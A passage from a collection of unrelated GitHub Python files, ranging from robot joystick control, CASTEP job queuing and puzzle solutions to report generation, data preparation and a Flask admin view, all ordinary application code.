print(\"--------------------------------------\")\n\n elif ev_type == 3:\n # all dacota-relatert informasjon (kode 2 og kode 5 for dacota) er usikkert, test?\n if code == 0:\n config.joySideInstance = scale(\n value,\n (robot.joystick[\"scale\"], 0),\n (100, -100))\n elif code == 1:\n config.joyForwardInstance = scale(\n value,\n (0, robot.joystick[\"scale\"]),\n (100, -100))\n elif code == 2 and robot.joystick[\"id\"] == \"dacota\":\n #POTENSIOMETER - dacota - USIKKERT\n config.joyPotMeterInstance = scale(\n value,\n (255, 0),\n (-100, +100))\n elif code == 5:\n #TORSION - dacota og logitech\n config.joyTwistInstance = scale(\n value,\n (255, 0),\n (+100, -100))\n elif code == 6 and robot.joystick[\"id\"] == \"logitech\":\n #POTENSIOMETER - logitech\n config.joyPotMeterInstance = scale(\n value,\n (255, 0),\n (-100, +100))\n\n # LOGITECH/DACOTA POV/HAT\n elif code == 16:\n # POV/hat switch - hoyre - venstre, 1 - 4294967295\n if value == 0:\n state = 0\n else:\n state = scale(value,(4294967295, 1),(-1,+1))\n config.joyPOVSideInstance = state\n elif code == 17:\n # POW/hat switch - ned - opp, 1 - 4294967295\n if value == 0:\n state = 0\n else:\n state = scale(value,(1, 4294967295),(-1,+1))\n config.joyPOVForwardInstance = state\n\n\ndef CloseFile(robot):\n if robot.joystick[\"in_file\"] != None:\n try:\n robot.joystick[\"in_file\"].close()\n except ValueError: # file already closed\n pass\n\n try:\n robot.dataToFile.close()\n except ValueError: # file already closed\n pass\n \n\n\ndef CloseJoystick(robot,Configs): \n if \"JoystickConnection\" in robot.__dict__:\n try:\n robot.JoystickConnection.send(b\"end?\")\n except OSError:\n pass\n robot.JoystickConnection.close()\n \n if Configs.livePlot:\n try:\n robot.connection.send(b\"end?\")\n except OSError:\n pass\n robot.connection.close()\n\n if \"sock\" in robot.__dict__:\n robot.sock.close()\n\n\n\ndef scale(value, src, dst):\n return ((float(value - src[0])\n / (src[1] - src[0])) * (dst[1] - dst[0])\n + dst[0])","repo_name":"Hakurem/LegoPython","sub_path":"Prosjekt00_TestOppkopling/moduler/EV3AndJoystick.py","file_name":"EV3AndJoystick.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4754856511","text":"#!/usr/bin/env python\n'''\n Author: Ran Zheng\n \n Source of demofiles: http://www.castep.org/Tutorials/BasicsAndBonding\n'''\n\nimport psutil as psl\nimport time as t\nimport os\n\ndef checkProcessIsExist(processName):\n '''\n Check if the process processName exists.\n '''\n flag = False\n for pid in psl.pids():\n # Check if process name contains the given processName.\n if psl.Process(pid).name().lower() == processName.lower():\n flag = True\n break\n return flag\n\ndef getFiles(suffix,dir=os.getcwd()):\n '''\n Get the file name of the specified folder *dir* and its subfolders in the specified format.\n '''\n rename = []\n # Iterate through the specified folder and its subfolders.\n for root,directory,files in os.walk(dir,topdown=True):\n for filename in files:\n # Split filename and suffix.\n fname,suf = os.path.splitext(filename)\n # Check if suf name contains the given suffix.\n if suf.lower() == suffix.lower():\n rename.append(os.path.join(root,fname))\n return(rename)\n\n# Notes: You need to prepare .param file corresponding to .cell file in the folder where you need to calculate.\nsuffix = '.cell'\n# You can set fpath to any folder path you want to calculate, and the path where runCASTEP.py is located as the default path. \nfpath = os.getcwd()\n\nfname = getFiles(suffix,fpath)\n# Number of CPU cores, you can customize **ncore** according to your CPU cores.\nncore = 4\nprocessName = 'castep.mpi'\n\ntaskId = 1\nif len(fname) > 0:\n for name in fname:\n cmd = 'mpirun -np '+ str(ncore)+' castep.mpi ' + name\n print('Task No.: '+ str(taskId)+'; Task Name: '+name)\n if taskId == 1:\n # Execute castep.mpi command\n os.system(cmd)\n else:\n while True:\n if checkProcessIsExist(processName):\n # Pause 1.5 seconds to avoid frequent judgments\n t.sleep(1.5)\n continue\n else:\n # Execute CASTEP\n os.system(cmd)\n break\n print()\n taskId += 1\n print('Task completed!')\nelse:\n print(\"No files in \" + suffix + \" format exist in the specified folder and its subfolders\")\n","repo_name":"ranzhengcode/runCASTEP","sub_path":"runCASTEP.py","file_name":"runCASTEP.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4636692743","text":"from l4e2_test_visualisation import visu2\r\n\r\na=[([3,2], [1,1], [2,1], 4)]\r\nb=[7]\r\n\r\na.append(([300,275], [150,150], [185,100], 500))\r\nb.append(9)\r\n\r\n\r\na.append(([10,10], [4,4], [3,3], 5000))\r\nb.append(739323)\r\n\r\na.append(([2,5], [1,2], [1,4], 11))\r\nb.append(27)\r\n\r\na.append(([23,10], [6,4], [3,2], 23))\r\nb.append(8)\r\n\r\n\r\na.append(([1250,1250], [1000,1000], [500,400], 10000))\r\nb.append(196)\r\n\r\na.append(([3,2], [1,1], [2,1], 8))\r\nb.append('jsp')\r\n\r\na.append(([8,4], [1,1], [1,2], 50))\r\nb.append('jsp')\r\n\r\na.append(([8,4], [7,3], [1,1], 8))\r\nb.append('jsp')\r\n\r\na.append(([20,20], [2,2], [2,4], 5))\r\nb.append('jsp')\r\n\r\n#==wrong answers==\r\na.append([[11, 14], [6, 8], [5, 1], 93])\r\na.append([[5, 4], [3, 1], [1, 2], 22])\r\na.append([[9, 42], [7, 9], [2, 4], 25])\r\n\r\n\r\n\r\ni=12\r\n\r\n\r\nimport math\r\nimport numpy as np\r\n\r\ndef getAngle(a):\r\n u1=np.array(a)/np.linalg.norm(np.array(a))\r\n if a[1]>0:\r\n angle=np.arccos(np.clip(np.dot(u1, np.array([1,0])), -1.0, 1.0))\r\n else:\r\n angle=-np.arccos(np.clip(np.dot(u1, np.array([1,0])), -1.0, 1.0))\r\n return(\"{:.12f}\".format(angle))\r\n\r\ndef length(shoot):\r\n return(math.sqrt(shoot[0]**2+shoot[1]**2))\r\n\r\ndef solution(dimensions, your_position, trainer_position, distance):\r\n possibleHeight=int(distance//dimensions[1])+1\r\n possibleWidth=int(distance//dimensions[0])+1\r\n targetShoots={}\r\n selfShoots={}\r\n \r\n for i in range(-possibleHeight,possibleHeight+1):\r\n if not i%2:\r\n targety=i*dimensions[1]+trainer_position[1]\r\n selfy=i*dimensions[1]+your_position[1]\r\n else:\r\n targety=(i+1)*dimensions[1]-trainer_position[1]\r\n selfy=(i+1)*dimensions[1]-your_position[1]\r\n \r\n for j in range(-possibleWidth,possibleWidth+1):\r\n if not j%2:\r\n targetx=j*dimensions[0]+trainer_position[0]\r\n selfx=j*dimensions[0]+your_position[0]\r\n else:\r\n targetx=(j+1)*dimensions[0]-trainer_position[0]\r\n selfx=(j+1)*dimensions[0]-your_position[0]\r\n\r\n targetshoot=[targetx-your_position[0],targety-your_position[1]]\r\n selfshoot=[selfx-your_position[0],selfy-your_position[1]]\r\n \r\n if length(selfshoot)<=distance and selfshoot!=[0,0]:\r\n angle=getAngle(selfshoot)\r\n if angle in selfShoots.keys():\r\n selfShoots[angle].append(length(selfshoot))\r\n else:\r\n selfShoots[angle]=[length(selfshoot)]\r\n\r\n if length(targetshoot)<=distance:\r\n angle=getAngle(targetshoot)\r\n if angle in targetShoots.keys():\r\n targetShoots[angle].append(length(targetshoot))\r\n else:\r\n targetShoots[angle]=[length(targetshoot)]\r\n goodShoots={}\r\n for angle in targetShoots.keys():\r\n if angle in selfShoots.keys():\r\n if min(selfShoots[angle])>=min(targetShoots[angle]):\r\n goodShoots[angle]=min(targetShoots[angle])\r\n else:\r\n goodShoots[angle]=min(targetShoots[angle])\r\n\r\n visu2(your_position,distance,goodShoots,targetShoots,selfShoots,dimensions)\r\n return(len(goodShoots))\r\n\r\nprint(solution(a[i][0],a[i][1],a[i][2],a[i][3]))\r\n","repo_name":"hugoleborso/foobar","sub_path":"levels/4/l4e2_test_close.py","file_name":"l4e2_test_close.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32964698147","text":"import subprocess\n\n#\n# Test for Scout2.py\n#\nclass TestScout2Class:\n\n #\n # Make sure that Scout2 does not crash with --help\n #\n def test_scout2_help(self):\n command = './Scout2.py --help'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n assert process.returncode == 0\n\n #\n # Make sure that Scout2's default run does not crash\n #\n def test_scout2_default_run(self):\n command = './Scout2.py --force'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n assert process.returncode == 0\n","repo_name":"saiteja16/Scout2","sub_path":"tests/test-scout2.py","file_name":"test-scout2.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"27836441717","text":"import re\n\nwith open('idiot.txt') as f1:\n with open('igrok.txt') as f2:\n words = re.findall(r'[\\w]+', f1.read()) + re.findall(r'[\\w]+', f2.read())\n freq = dict()\n\n for x in words:\n if x in freq.keys():\n freq[x][0] += 1\n else:\n freq[x] = [1, 0.0]\n\n count = len(words)\n for x in freq.keys():\n freq[x][1] = freq[x][0] / count\n\n freq = dict(sorted(freq.items(), key=lambda item: item[1][0], reverse=True))\n\n for k, v in freq.items():\n print(k, *v)","repo_name":"zzemlyanaya/PythonEdu","sub_path":"uni/python_3sem/task1/markov_graphs.py","file_name":"markov_graphs.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14694992930","text":"active = False\nwhile active == False:\n\n print(\"please enter your 5 marks below\")\n\n#read 5 inputs (missing int( before (input)))\n mark1 = int(input(\"enter mark 1: \"))\n mark2 = int(input(\"enter mark 2: \"))\n mark3 = int(input(\"enter mark 3: \"))\n mark4 = int(input(\"enter mark 4: \"))\n mark5 = int(input(\"enter mark 5: \"))\n\n\n\n#determine if scores are between 0 and 100, if not, reload program from beginning. (this was missing in the initial version)\n if mark1 < 0 or mark1 > 100 or mark2 < 0 or mark2 > 100 or mark3 < 0 or mark3 > 100 or mark4 < 0 or mark4 > 100 or mark5 < 0 or mark5 > 100:\n print(\"error: marks must be between 0 and 100\")\n else:\n active = True\n \n#create array/list with five marks\nmarksList = [mark1, mark2, mark3, mark4, mark5]\n\n#print the array/list (simply added an asterisk before marksList to create a mathematical expression)\nprint(*marksList)\n\n#calculate the sum and average\nsumOfMarks = sum(marksList)\naverageOfMarks = sum(marksList)/5\n\n#display results\nprint(\"The sum of your marks is: \"+str(sumOfMarks))\nprint(\"The average of your marks is: \"+str(averageOfMarks))\n","repo_name":"RayyanHodges/Marks","sub_path":"marks.py","file_name":"marks.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"594588592","text":"import sys\nimport time\nimport datetime\nimport os\n\nstartTime = datetime.datetime.now()\n\nnameScript = 'get-ngavHostData'\n\npathDirRoot = os.path.dirname(__file__)\npathDirOutput = pathDirRoot + '\\\\output\\\\'\npathDirLog = pathDirRoot + '\\\\log\\\\'\n\nnameFileLog = nameScript + '_log.txt'\npathFileLog = pathDirLog + nameFileLog\n\nnameFileLogOld = nameScript + '_log_old.txt'\npathFileLogOld = pathDirLog + nameFileLogOld\n\nnameFileDataCurrent = nameScript + '_current.csv'\npathFileDataCurrent = pathDirOutput + nameFileDataCurrent\n\nnameFileDataPrevious = nameScript + '_previous.csv'\npathFileDataPrevious = pathDirOutput + nameFileDataPrevious\n\n\ndef log(data, s=0, e=0, f=1):\n\n\tif e == 1:\n\t\texcInfo = sys.exc_info()\n\t\tprint(data)\n\t\tprint(excInfo)\n\telse:\n\t\tprint(data)\n\t\n\tif s == 1:\n\t\tseparator = '/' * 50\n\t\tprint(separator + '\\n')\n\t\n\tif f == 1: # write to file\n\t\tdateTimeNow = str(datetime.datetime.now())\n\t\tobjFile = open(pathFileLog, 'a')\t\n\t\tobjFile.write(dateTimeNow + ' - ' + data + '\\n')\n\n\t\tif e == 1:\n\t\t\tobjFile.write(dateTimeNow + ' - ' + excInfo + '\\n')\n\n\t\tif s == 1:\n\t\t\tobjFile.write(dateTimeNow + ' - ' + separator + '\\n')\n\n\t\tobjFile.close()\n\n#log(pathDirOutput)\n\n\ndef manageDataFile(fileCurrent, filePrevious):\n\t\n\tlog('managing data files ..')\n\tif os.path.exists(fileCurrent) == True and os.path.exists(filePrevious) == True:\n\t\tlog('.. deleting ' + filePrevious + ' ..')\n\t\tos.remove(filePrevious)\n\t\tlog('.. deleting ' + filePrevious + ' done')\n\t\n\tif os.path.exists(fileCurrent) == True:\n\t\tlog('.. renaming ' + fileCurrent + ' ..')\n\t\tos.rename(fileCurrent, filePrevious)\n\t\tlog('.. renaming ' + fileCurrent + ' done')\n\n\t\tobjFile = open(fileCurrent, 'w')\n\t\tobjFile.close()\n\t\n\tlog('managing data files done', s=1)\n\n#manageDataFile(pathFileDataCurrent, pathFileDataPrevious)\n\n\ndef manageLogFile(fileLog, fileLogOld, daysBack):\n\t\n\tif os.path.exists(fileLog) == True:\n\n\t\tlog('checking current log file: ' + fileLog + ' ..')\n\n\t\ttimeNow = time.time()\n\t\ttimeDaysBack = timeNow - daysBack * 86400\n\t\tlog('.. date ' + str(daysBack) + ' + days back: ' + time.ctime(timeDaysBack))\n\n\t\ttimeFile = os.stat(pathFileLog).st_ctime\n\t\tlog('.. log file creation date: ' + time.ctime(timeFile))\n\n\t\t\n\t\tif timeFile < timeDaysBack:\n\t\t\tlog('.. log file is older than ' + str(daysBack) + ' days')\n\t\t\tif os.path.exists(fileLogOld) == True:\n\t\t\t\tlog('.. deleting ' + fileLogOld + ' ..')\n\t\t\t\tos.remove(fileLogOld)\n\t\t\t\tlog('.. deleting ' + fileLogOld + ' done')\n\t\t\t\n\t\t\tlog('.. renaming ' + fileLog + ' ..')\n\t\t\tos.rename(fileLog, fileLogOld)\n\t\t\tlog('.. renaming ' + fileLog + ' done')\n\t\telse:\n\t\t\tlog('.. log file is not older than ' + str(daysBack) + ' days')\n\n\t\tlog('checking current log file: ' + fileLog + ' done', s=1)\n\n\n\nmanageDataFile(pathFileDataCurrent, pathFileDataPrevious)\nmanageLogFile(pathFileLog, pathFileLogOld, 30)\n\n\n\n# startTime = datetime.datetime.now()\n\n# #manageDataFile(pathFileDataCurrent, pathFileDataPrevious)\n# #print(\"Last modified: %s\" % time.ctime(os.path.getmtime(\"test.txt\")))\n# #print(\"Created: %s\" % time.ctime(os.path.getctime(\"test.txt\")))\n\n# timeNow = time.time()\n# timeOld = timeNow - 7 * 86400 # minus 7 days\n\n# log(str(timeNow))\n# log(str(timeOld))\n# log(time.ctime(timeNow))\n# log(time.ctime(timeOld))\n\n\n\n# log(str(os.path.getctime(pathFileLog)), s=1)\n\n\n# log(time.ctime(timeNow))\n# log(str(datetime.datetime.now()))\n# log(time.ctime(os.path.getctime(pathFileLog)))\n\n# log(str(os.stat(pathFileLog).st_ctime))\n\n#time.sleep(3)\n\n\n\n#log(str(datetime.timedelta(day=5)))\n\n\n\n\nlog('script run time: '+ str(datetime.datetime.now() - startTime), s=1)\n","repo_name":"goamage/roam","sub_path":"Python/Learning/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29014325469","text":"import math\n\n\nclass Position:\n def __init__(self, x:float, y:float):\n self.x = x\n self.y = y\n\n def __str__(self):\n return f'{self.x} / {self.y}'\n\n\nclass Polyline:\n def __init__(self):\n self.positions = []\n\n def add_position(self, pos: Position):\n self.positions.append(pos)\n\n def length(self):\n if len(self.positions) < 2:\n return 0\n overall = 0\n for i in range(1, len(self.positions)):\n p1 = self.positions[i - 1]\n p2 = self.positions[i]\n distance = math.sqrt((p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y))\n overall = overall + distance\n return overall\n\n def __str__(self):\n res = \"\"\n for p in self.positions:\n res = f'{res}\\n {str(p)}'\n return f'Positionen:{res}\\nLänge: {self.length()}'\n\n\npoly = Polyline()\npoly.add_position(Position(0, 0))\npoly.add_position(Position(10, 0))\npoly.add_position(Position(10, 10))\nprint(poly)","repo_name":"Marloto/prog2-ws2022","sub_path":"09-positions/muster.py","file_name":"muster.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39257576543","text":"import tensorflow as tf\r\nimport pandas as pd\r\nimport model.probe_dnn.label as label\r\nimport os\r\n\r\n# 모델 로드\r\nfeature_names = []\r\nfn_path = os.path.dirname(os.path.realpath(__file__)) + \"/Field_Names.txt\"\r\nwith open(fn_path, \"r\") as f:\r\n for line in f.readlines()[0:]:\r\n name, __ = line.strip()[:-1].split(\":\")\r\n feature_names.append(name)\r\n\r\npath = os.path.dirname(os.path.realpath(__file__)) + \"/dos_model.h5\"\r\nmodel = tf.keras.models.load_model(path)\r\n\r\n\r\ndef dos_model(data):\r\n # DoS 모델\r\n df = pd.DataFrame(columns=feature_names)\r\n if isinstance(data, list):\r\n df.loc[0] = data\r\n elif isinstance(data, pd.DataFrame):\r\n df = data\r\n df.columns = feature_names\r\n else:\r\n print(\"list나 DataFrame으로 넣어주세요\")\r\n return\r\n\r\n df2 = label.trans(df)\r\n prec = model.predict(df2.df)\r\n threshold = 0.5\r\n prec2 = 1 if prec[0][0] > threshold else 0\r\n df = df.drop([0], axis=0)\r\n return prec2\r\n","repo_name":"myeongseop2/NIDS_project","sub_path":"source/model/dos_dnn/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"71297979410","text":"# [백준 20057] 마법사 상어와 토네이도\n# import sys\n# input = sys.stdin.readline\n\n# N = int(input().rstrip())\n# data = [list(map(int, input().split())) for _ in range(N)]\n\n# # 모래이동\n# def moveSand(prev, y, x, d):\n# sand = 0\n# percent1 = int(prev*0.01)\n# percent2 = int(prev*0.02)\n# percent5 = int(prev*0.05)\n# percent7 = int(prev*0.07)\n# percent10 = int(prev*0.1)\n# return sand\n\n# cy, cx = N//2, N//2\n# count = 0\n# for i in range(1, N+1):\n# # 홀수이면 왼쪽, 아래 방향\n# if i % 2 != 0:\n# # 왼쪽\n# count += moveSand(data[cy][cx], cy, cx-i, 'left')\n# cx -= i\n# # 아래쪽\n# count += moveSand(data[cy][cx], cy-i, cx, 'down')\n# cy -= i\n# else: # 짝수이면 오른쪽, 위 방향 \n# # 오른쪽\n# count += moveSand(data[cy][cx], cy, cx+i, 'right')\n# cx += i\n# # 위쪽\n# count += moveSand(data[cy][cx], cy+i, cx, 'up')\n# cy += i\n\n\n# 모래 계산하는 함수\ndef recount(time, dx, dy, direction):\n global ans, s_x, s_y\n\n # y좌표 계산 & x좌표 갱신\n for _ in range(time):\n s_x += dx\n s_y += dy\n if s_y < 0: # 범위 밖��면 stop\n break\n\n # 3. a, out_sand\n total = 0 # a 구하기 위한 변수\n for dx, dy, z in direction:\n nx = s_x + dx\n ny = s_y + dy\n if z == 0: # a(나머지)\n new_sand = sand[s_x][s_y] - total\n else: # 비율\n new_sand = int(sand[s_x][s_y] * z)\n total += new_sand\n\n if 0 <= nx < N and 0 <= ny < N: # 인덱스 범위이면 값 갱신\n sand[nx][ny] += new_sand\n else: # 범위 밖이면 ans 카운트\n ans += new_sand\n\n\nN = int(input())\nsand = [list(map(int, input().split())) for _ in range(N)]\n\n# 2. 방향별 모래 비율 위치\nleft = [(1, 1, 0.01), (-1, 1, 0.01), (1, 0, 0.07), (-1, 0, 0.07), (1, -1, 0.1),\n (-1, -1, 0.1), (2, 0, 0.02), (-2, 0, 0.02), (0, -2, 0.05), (0, -1, 0)]\nright = [(x, -y, z) for x, y, z in left]\ndown = [(-y, x, z) for x, y, z in left]\nup = [(y, x, z) for x, y, z in left]\n\ns_x, s_y = N//2, N//2 # 시작좌표(x좌표)\nans = 0 # out_sand\n\n# 1.토네이도 회전 방향(y위치)\nfor i in range(1, N + 1):\n if i % 2:\n recount(i, 0, -1, left)\n recount(i, 1, 0, down)\n else:\n recount(i, 0, 1, right)\n recount(i, -1, 0, up)\n\nprint(ans)\n","repo_name":"BBIYAC/CodingTest","sub_path":"Baekjoon/20057.py","file_name":"20057.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70662679570","text":"from django.conf import settings\nfrom django.utils import timezone\n\nfrom pymongo import MongoClient\n\nimport requests\n\nimport os\n\nfrom decimal import Decimal\n\ndef stringify_date(date_list):\n return ''.join(['%s-' % elem for elem in date_list])[:-1]\n\ndef stringify_service_and_dates(service=None, date=None, _from=None, to=None):\n if service:\n string = service\n else:\n string = ''\n\n if date:\n if service:\n string += '_'\n string += stringify_date(date.values())\n else:\n if service:\n string += '_'\n string += stringify_date(_from.split('-'))\n if service:\n string += '_to_'\n else:\n string += ' To '\n string += stringify_date(to.split('-'))\n\n return string\n\ndef vends_reporter(date=None, _from=None, to=None):\n url = settings.VENDOR_VENDS_URL\n\n if date:\n response = requests.get(url, params=date).json()\n file_name = '%s.%s' % (stringify_service_and_dates(service='vends', date=date), 'csv')\n else:\n response = requests.get(url, params={'from': _from, 'to': to}).json()\n file_name = '%s.%s' % (stringify_service_and_dates(service='vends', _from=_from, to=to), 'csv')\n\n vendors = response['vendors']\n voucher_values = response['voucher_values']\n\n if vendors:\n # Add more key/value pairs to vendor objects\n\n # Add total vend value\n [vendor.update({\n 'total_vend_value': sum([vc['value'] * vc['count'] for vc in vendor['vend_count']])\n }) for vendor in vendors]\n\n # Add total vend count\n [vendor.update({\n 'total_vend_count': sum([vc['count'] for vc in vendor['vend_count']])\n }) for vendor in vendors]\n\n header = '%s%s%s%s%s%s%s%s\\n' % (\n 'Vendor Name,',\n 'Vendor Company,',\n ','.join([str(value) for value in voucher_values]),\n ',Total Vend Count',\n ',Total Vend Value (GHS)',\n ',Bonus',\n ',Commission',\n ',Net Revenue'\n )\n\n _file = os.path.join(settings.MEDIA_ROOT, file_name)\n\n with open(_file, 'w') as f:\n f.write(header)\n for vendor in vendors:\n vend_count = vendor['vend_count']\n vend_count_string = ','.join([str(elem['count']) for elem in vend_count])\n\n sales = Decimal(vendor['total_vend_value'])\n bonus = revenue = sales / 2\n commission = (sales - bonus) / 10\n net_revenue = revenue - commission\n\n line = '%s,%s,%s,%s,%s,%s,%s,%s\\n' % (\n vendor['name'],\n vendor['company_name'],\n vend_count_string,\n vendor['total_vend_count'],\n str(sales),\n str(bonus),\n str(commission),\n str(net_revenue)\n )\n\n f.write(line)\n\n # Insert into database\n # vendor_collection = get_collection('vendors')\n # result = vendor_collection.insert_many(vendors)\n\n return file_name\n\ndef send_report(service, _file, date=None, _from=None, to=None):\n subject_and_body = settings.EMAIL_SUBJECT_AND_BODY[service]\n subject = subject_and_body['subject']\n body = subject_and_body['body']\n\n period = stringify_service_and_dates(service=None, date=date, _from=_from, to=to)\n\n # Send email\n response = requests.get(settings.MESSAGING_URL, params={\n 'subject': '%s: %s' % (subject, period),\n 'message': body,\n 'sender': settings.DEFAULT_FROM_EMAIL,\n 'recipients': settings.TO,\n 'file': _file,\n })\n\n return response\n\nREPORT_HANDLERS = {\n 'vends': vends_reporter,\n}\n\ndef create_report(host, service, date=None, _from=None, to=None):\n report = REPORT_HANDLERS[service]\n\n if date:\n file_name = report(date=date)\n else:\n file_name = report(_from=_from, to=to)\n\n if file_name:\n _file = '%s%s%s%s' % ('http://', host, settings.MEDIA_URL, file_name)\n return _file\n\ndef get_collection(collection_name):\n client = MongoClient()\n db = client.reports\n return db[collection_name]","repo_name":"deone/reports","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1094091930","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef cop(f_ext, h_ext, m) -> float:\n g: float = 9.81\n z = f_ext * h_ext / m / g\n return z\n\n\nh_ext = 2.0\nmass_robot = 50\nf_ext_max = 100\nf_ext = np.linspace(0, 100)\n\ncop_deviation = cop(f_ext, h_ext, mass_robot)\n\nplt.plot(f_ext, cop_deviation)\nplt.xlabel(\"Applied force [N]\")\nplt.ylabel(\"CoM-CoP [m]\")\nplt.show()\n","repo_name":"andrei-herdt/playground","sub_path":"analysis/plot_forces.py","file_name":"plot_forces.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25888045132","text":"import pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.simplefilter('ignore')\n\n\ndef owners(cell):\n if cell in ['1владелец', '1 владелец']:\n return 1\n elif cell in ['2владельца', '2 владельца']:\n return 2\n else:\n return 3\n\n\ndef vendor(cell):\n if cell in ['bmw', 'mercedes', 'volkswagen', 'audi']:\n return 'Германия'\n elif cell == 'volvo':\n return 'Швеция'\n elif cell == 'skoda':\n return 'Чехия'\n else:\n return 'Япония'\n\n\npd.set_option('display.max_columns', None)\n\ndata_test = pd.read_csv('test.csv')\ndata = pd.read_csv('train.csv')\n\n# ================================================================================\n# Train data preparing\n\ndata = data.drop(\n ['Статус', 'Кузов №', 'Количество месте', 'Запас хода', 'Количество мест', 'Налог', 'Обмен',\n 'Класс автомобиля', 'Таможня'], axis=1\n )\n\ndata = data.rename(\n columns={'год выпуска': 'productionDate', 'Пробег': 'mileage', 'Кузов': 'bodyType', 'Цвет': 'color',\n 'Страна марки': 'vendor', 'Коробка': 'vehicleTransmission', 'Количество дверей': 'numberOfDoors',\n 'Complectation': 'complectation_dict'}\n )\n\ndata = data[['bodyType', 'brand', 'color', 'complectation_dict', 'engineDisplacement', 'enginePower', 'fuelType',\n 'mileage', 'model_name', 'numberOfDoors', 'productionDate', 'vehicleTransmission', 'vendor', 'Владельцы',\n 'ПТС', 'Привод', 'Руль', 'Состояние', 'price']]\n\ncolumns = list(data.columns)[:-1]\n\ndata = data.dropna(how='all').reset_index(drop=True)\n\ndata['mileage'] = data['mileage'].apply(lambda x: int(x[:x.find('км')]))\n\ndata['engineDisplacement'] = data['engineDisplacement'].apply(lambda x: float(x[:x.find('л')]))\ndata['enginePower'] = data['enginePower'].apply(\n lambda x: int(float(x[:x.find('кВт')]) * 1.36) if x.find('л.') == -1 else int(x[:x.find('л')]))\n\ncheck_list = data[data['numberOfDoors'] == 0]['model_name'].to_list()\n\nfor model in check_list:\n data[(data['model_name'] == model) & (data['numberOfDoors'] == 0)] = \\\n data[(data['model_name'] == model) & (data['numberOfDoors'] != 0)].mode()\n\ndata = data.dropna(how='all').reset_index(drop=True)\n\ndata['fuelType'] = data['fuelType'].apply(lambda x: 'электро' if len(str(x)) == 3 else x.lower())\ndata['fuelType'] = data['fuelType'].apply(lambda x: 'газ' if x.find('газобаллонное') != -1 else x)\n\nfor row in range(data.shape[0]):\n if data['fuelType'].iloc[row] == 'электро':\n data['engineDisplacement'].iloc[row] = 0\n\ndata['Владельцы'] = data['Владельцы'].apply(owners).astype(object)\n\ndata['complectation_dict'] = data['complectation_dict'].apply(\n lambda x: x.replace('[', '').replace(']', '').replace(\"'\", '').split(', '))\ndata['complectation'] = data['complectation_dict'].apply(lambda x: len(x))\ndata = data.drop(['complectation_dict'], axis=1)\n\ndata['price'] = data['price'].apply(lambda x: x / 100)\n\n# ================================================================================\n# Test data preparing\n\ndata_test = data_test[columns]\ndata_test['brand'] = data_test['brand'].apply(lambda x: x.lower())\n\ndata_test['complectation_dict'] = data_test['complectation_dict'].fillna(0)\ndata_test['complectation'] = data_test['complectation_dict'].apply(\n lambda x: len(x[x.find('[') + 1:x.find(']')].split('\",\"')) if x else x)\ndata_test = data_test.drop(['complectation_dict'], axis=1)\n\ndata_test['engineDisplacement'] = data_test['engineDisplacement'].apply(\n lambda x: float(x[:x.find('LTR')]) if len(x) > 4 else 0)\n\ndata_test['enginePower'] = data_test['enginePower'].apply(lambda x: int(x[:x.find('N')]))\n\ndata_test['vendor'] = data_test['brand'].apply(vendor)\n\ndata_test['Владельцы'] = data_test['Владельцы'].apply(lambda x: owners(x.replace('\\xa0', ''))).astype(object)\n\ndata.to_csv('train_prepared.csv', index=False)\ndata_test.to_csv('test_prepared.csv', index=False)\n\n","repo_name":"RifatM21/Skill_factory","sub_path":"Pr_6/data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1916615993","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\nfrom . import admin\nfrom .. import db\nfrom .forms import CreateUserForm, DeactiveUserForm, ActiveUserForm\nfrom .forms import RenewfeeForm, RenewTrafficForm\nfrom ..models import User, Userlog, Package, Usertraffic\nfrom flask import render_template, session, redirect, url_for, request\nfrom datetime import datetime\nfrom dateutil.relativedelta import *\n\n\ndef get_period(payday):\n d = datetime.now()\n if d.day < payday:\n d = d + relativedelta(months=-1)\n return datetime(d.year, d.month, payday, 0, 0, 0).strftime(\"%y-%m-%d\")\n else:\n return datetime(d.year, d.month, payday, 0, 0, 0).strftime(\"%y-%m-%d\")\n\n\n@admin.route(\"/\")\ndef admin_main():\n return render_template(\"admin/main.html\")\n\n@admin.route(\"/info/user\")\ndef admin_user_info():\n users = []\n for user in User.query.all():\n package = Package.query.filter_by(id=user.package_id).first()\n\n if user.status == 'active':\n if relativedelta(user.expired, datetime.now()).months >= 